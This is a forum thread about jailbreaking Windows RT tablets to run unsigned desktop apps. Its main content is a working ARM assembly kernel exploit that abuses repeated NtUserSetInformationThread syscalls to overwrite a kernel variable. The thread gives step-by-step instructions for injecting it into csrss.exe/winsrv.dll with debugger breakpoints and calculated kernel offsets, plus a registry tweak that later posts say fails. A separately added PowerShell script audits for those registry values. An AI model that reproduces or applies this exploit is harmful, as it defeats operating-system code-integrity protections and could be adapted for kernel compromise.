[Q] Hacking Windows RT to Run Desktop Apps?

netham45

Inactive Recognized Developer
Jun 24, 2009
Denver
Cool!
Do you think that Microsoft can patch your exploit?
Do you think we should stop Surface updates until you provide us a tool or something like that?
I don't know if you foresee doing that :confused:
@+
They could, but since we can reinstall the OS from the recovery partition and there'll always be a copy of the unpatched recovery partition around we can revert any patches they throw out.

They could also ban MS accounts for doing this too, though I don't expect them to do that.
 

mamaich

Retired Recognized Developer
Apr 29, 2004
mamaich-eng.blogspot.ru
Hmm, it seems that there is already a working and very easy method that allows running unsigned apps on RT:
http://younsi.blogspot.ru/2012/10/notepad-for-windows-8-rt.html
Just create UMCIAuditMode=1 in "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\CI" and reboot.

Can someone confirm that it works? As far as I can see, this really should work, as it sets g_CiOptions |= 0x40 in ci.dll, which later sets g_CiDeveloperMode = 6, which should allow unsigned apps in the dir specified by the "TestPath" key under "HKLM\System\CurrentControlSet\Control\CI\TRSData" (see this post: http://forum.xda-developers.com/showpost.php?p=33069395&postcount=10).

So all credit for finding a working and easy "desktop-unlocking" method should go to Thomas Younsi.

Edited:
As far as I can see, this effectively turns on the "CI Audit" mode, which does not block unsigned apps from running but just logs them. So adding a path to "TestPath" should not be necessary.
And yes, this can be blocked by MS in later updates. But I really don't think they would do that soon (or ever).
 
  • Like
Reactions: MLX
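As an added defensive check that is not part of the thread: a PowerShell snippet that audits the Control\CI key discussed above for the UMCIAuditMode value and a TRSData\TestPath entry. Later posts report that the trick has no effect on a stock Surface, but neither value belongs on a production image, so their presence is worth flagging; the function name and severity labels are my own.

```powershell
# Added defensive example (not from the thread): enumerate the Code Integrity
# registry values discussed above. Function name and severity labels are mine.
$CiKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\CI'
$TrsKey = Join-Path $CiKey 'TRSData'

function Get-CIOverrideFindings {
    $findings = @()

    # UMCIAuditMode: when honoured by ci.dll, user-mode CI logs unsigned
    # binaries instead of blocking them. Absent on a stock install.
    $ci = Get-ItemProperty -Path $CiKey -ErrorAction SilentlyContinue
    if ($ci -and $ci.PSObject.Properties['UMCIAuditMode']) {
        $data = [int]$ci.UMCIAuditMode
        $findings += [pscustomobject]@{
            Key      = $CiKey
            Value    = 'UMCIAuditMode'
            Data     = $data
            Severity = $(if ($data -ne 0) { 'High' } else { 'Info' })
            Note     = 'User-mode CI audit mode flag'
        }
    }

    # TRSData\TestPath: directory exempted from signature enforcement when
    # developer mode is active. Any value here warrants a look.
    $trs = Get-ItemProperty -Path $TrsKey -ErrorAction SilentlyContinue
    if ($trs -and $trs.PSObject.Properties['TestPath']) {
        $findings += [pscustomobject]@{
            Key      = $TrsKey
            Value    = 'TestPath'
            Data     = [string]$trs.TestPath
            Severity = 'High'
            Note     = 'Unsigned-code test path exemption'
        }
    }
    # Leading comma keeps the result an array even when empty or single-item
    return ,$findings
}

$results = Get-CIOverrideFindings
if ($results.Count -eq 0) {
    Write-Output "No UMCIAuditMode or TestPath values found under $CiKey"
} else {
    $results | Format-Table Key, Value, Data, Severity, Note -AutoSize
}
```

Run from an elevated session; a non-empty table is a prompt to check who created the value and when, since both are set only by deliberate administrative action.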

netham45

Inactive Recognized Developer
Jun 24, 2009
Denver


Nesting VNC windows is fun.

(Also, yes, I misspelled the name on my tablet.)


The main issue I had with recompiling, other than the libs, was the SxS manifests. I couldn't get them to work, so I just disabled them. Also, TightVNC has /machine:x86 set statically a few times in its configs, though that was easy enough to fix.


Also, here's PuTTY. I got fed up with winspool not working right so I just commented out all the calls to it, so printing may not (as in, won't) work right.
 


netham45

Inactive Recognized Developer
Jun 24, 2009
Denver
I can't confirm it; none of your apps work:

"windows cannot verify the digital signature ..."
Please read the past 3 or 4 pages of the thread. You have to do the exploit clrokr documented to get them to run.

Edit: Unless you were responding to mamaich, in which case ignore me.
 

Dewinter

Senior Member
Dec 21, 2009
wuhan
Please read the past 3 or 4 pages of the thread. You have to do the exploit clrokr documented to get them to run.

Edit: Unless you were responding to mamaich, in which case ignore me.
1) Get kernel base w/ app higher in post
2) Put base in the my_addr field in the source
3) armasm -o exploit.o exploit.asm
4) Taking the code starting at 0x64 (push r5) and putting it in Winsrv.dll!0x10800
5) Placing a breakpoint right after 'bl NtUserSetInformationThread (75475134h)' (Note that there are two calls to NtUserSetInformationThread, I've tried putting the break right after both)
6) Placing a breakpoint at mov r0,r0 at Winsrv.dll!0x10800
7) Resuming CSRSS
8) Hitting vol down
9) Moving PC to Winsrv.dll!0x10800
10) Resume, at this point I BSoD.


3) When I run armasm, I always get errors like D:\arm.s(1) : error A2034: unknown opcode: {
push {r5-r8}

Can you please share your source code? I'm not familiar with ARM assembly.
 
  • Like
Reactions: farafr

lilstevie

Senior Recognized Developer
Apr 17, 2009
1) Get kernel base w/ app higher in post
2) Put base in the my_addr field in the source
3) armasm -o exploit.o exploit.asm
4) Taking the code starting at 0x64 (push r5) and putting it in Winsrv.dll!0x10800
5) Placing a breakpoint right after 'bl NtUserSetInformationThread (75475134h)' (Note that there are two calls to NtUserSetInformationThread, I've tried putting the break right after both)
6) Placing a breakpoint at mov r0,r0 at Winsrv.dll!0x10800
7) Resuming CSRSS
8) Hitting vol down
9) Moving PC to Winsrv.dll!0x10800
10) Resume, at this point I BSoD.


3) When I run armasm, I always get errors like D:\arm.s(1) : error A2034: unknown opcode: {
push {r5-r8}

Can you please share your source code? I'm not familiar with ARM assembly.
You need to indent all opcodes.
 

peterdn

Member
Sep 19, 2010
Oxford
Also, here's PuTTY. I got fed up with winspool not working right so I just commented out all the calls to it, so printing may not (as in, won't) work right.
What problems did you have with winspool? Only issue I had (couldn't find it at runtime) was resolved by putting a copy of it named winspool.dll in PuTTY's working directory.
 

netham45

Inactive Recognized Developer
Jun 24, 2009
Denver
3) When I run armasm, I always get errors like D:\arm.s(1) : error A2034: unknown opcode: {
push {r5-r8}

Can you please share your source code? I'm not familiar with ARM assembly.
Code:
	push {r5-r8}
	mov r7, 0x80000
	ldr r8, my_addr
loc_loop_begin
	movs r3, 0xC
	add r2, sp, 0x68 ;0x58 org.
	add r5, r2, 4
	str r8, [r5]
	movs r1, 9
	mvn r0, 1
	mov r12, 0x10E1
	svc 1
	subs r7, r7, 1
	cmp r7, 0
	bne loc_loop_begin
	pop {r5-r8}
	mov r0, r0
my_addr dcd 0x<Kernel Base + 0x19FFA4 + 0x18>
	end
Fix the my_addr line with yours.

please please share this. I have looked high and low for something like putty but there's nothing but junk in the app store.

I posted a build of putty a couple posts ago.
 
  • Like
Reactions: apatcas and foxl3y

rheza02

Senior Member
May 20, 2006
Please read the past 3 or 4 pages of the thread. You have to do the exploit clrokr documented to get them to run.

Edit: Unless you were responding to mamaich, in which case ignore me.
Your discussion is out of my league; I can't understand what you guys are talking about. Keep up the good work, thanks.
 

mamaich

Retired Recognized Developer
Apr 29, 2004
mamaich-eng.blogspot.ru
I can confirm that it doesn't work :( That would have been a nice way to do it though, very easy and scriptable.
Now I see it in the code: it calls ZwQuerySystemInformation(143,...) and checks those flags only if it returns error 0x80430006 (not implemented?) or returns success and some bit in the result is set to 1 (probably that bit shows that we are using a "development device"). Or if a kernel debugger is active. So no luck here. At least until we find the implementation of that ZwQuerySystemInformation(143) and force it to return an error.

Damn Thumb, x86/x64 is much simpler :(

Updated: 143 == SeSecureBootQueryInformation. Just to be indexed by Google.
Maybe switching off the secure boot policy, as I've posted earlier, would help?
 

Dewinter

Senior Member
Dec 21, 2009
wuhan
Code:
	push {r5-r8}
	mov r7, 0x80000
	ldr r8, my_addr
loc_loop_begin
	movs r3, 0xC
	add r2, sp, 0x68 ;0x58 org.
	add r5, r2, 4
	str r8, [r5]
	movs r1, 9
	mvn r0, 1
	mov r12, 0x10E1
	svc 1
	subs r7, r7, 1
	cmp r7, 0
	bne loc_loop_begin
	pop {r5-r8}
	mov r0, r0
my_addr dcd 0x<Kernel Base + 0x19FFA4 + 0x18>
	end
Fix the my_addr line with yours.




I posted a build of putty a couple posts ago.
Thanks, it works.
 

clrokr

Senior Member
Aug 2, 2009
Now I see in the code - it calls ZwQuerySystemInformation(143,...) and checks those flags only if it returns error 0x80430006 (not implemented?) or returns success and some bit in result is set to 1 (probably that bit shows that we are using a "development device"). Or if kernel debugger is active. So no luck here. At least until we'll find the implementation of that ZwQuerySystemInformation(143) and force it to return error.

Damn thumb, x86/x64 is much simpler :(
ZwQuerySystemInformation(143,...) leads to SeSecureBootQueryInformation...
 

windowsrtc

Senior Member
Nov 21, 2012
What's wrong with my steps? Please help.
Here are my steps. I need help with step 6.
1. Get my_addr dcd
View attachment 1624951
my_addr dcd: 0x8341d000+0x19ffa4+0x18=0x835bcfbc

2. Change my_addr dcd in exploit.asm and compile it
loc_loop_begin
	movs r3, 0xC
	add r2, sp, 0x68 ;0x58 org.
	add r5, r2, 4
	str r8, [r5]
	movs r1, 9
	mvn r0, 1
	mov r12, 0x10E1
	svc 1
	subs r7, r7, 1
	cmp r7, 0
	bne loc_loop_begin
	pop {r5-r8}
	mov r0, r0
my_addr dcd 0x835bcfbc
	end

3. Attach to csrss.exe
attach.jpg

4. Find the winsrv.dll base: 0x74f00000
winsrv.jpg

5. Put the code at 0x74f00000+0x10800=0x74f10800
put.jpg

6. "Placing a breakpoint right after 'bl NtUserSetInformationThread (75475134h)'"
Here is my question. I can't find bl NtUserSetInformationThread (75475134h) // How can I find this address?
And I can't find this code:
TerminalServerRequestThread+0x230 // How can I find this address?
MOVS R3, #0xC
ADD R2, SP, #0x58
MOVS R1, #9
MOV R0, 0xFFFFFFFE
BL NtUserSetInfomationThread

So I found something like this:

br1.jpg
and I set a breakpoint at 0x74f03640

7. After pressing volume down, csrss.exe breaks at 0x74f03640 and I change PC to 0x74f10800
p1.jpg

8. Press F11 and set a breakpoint at 0x74f1082e
b2.jpg

9. After resuming I get a BSoD

My step 6 may be incorrect, so please help.

BTW, I'm using a Chinese-version Surface.
 

peterdn

Member
Sep 19, 2010
Oxford
6. "Placing a breakpoint right after 'bl NtUserSetInformationThread (75475134h)'"
Here is my question. I can't find bl NtUserSetInformationThread (75475134h) // How can I find this address?
And I can't find this code:
TerminalServerRequestThread+0x230 // How can I find this address?
MOVS R3, #0xC
ADD R2, SP, #0x58
MOVS R1, #9
MOV R0, 0xFFFFFFFE
BL NtUserSetInfomationThread


The call to NtUserSetInformationThread that you want is at +0x365e from the base address, if I remember correctly. From your screenshot I see you are at +0x3640 from base, so, just scroll down a little and set your breakpoint immediately after the bl instruction.
 

netham45

Inactive Recognized Developer
Jun 24, 2009
Denver
Make sure that you have symbols loading properly too, I had to go into options and enable the MS Symbol Server before I could get it to load symbols for me. Then you'll be able to find the function.

Also,


No networking, since that relies on winpcap, but everything else seems to be working well enough.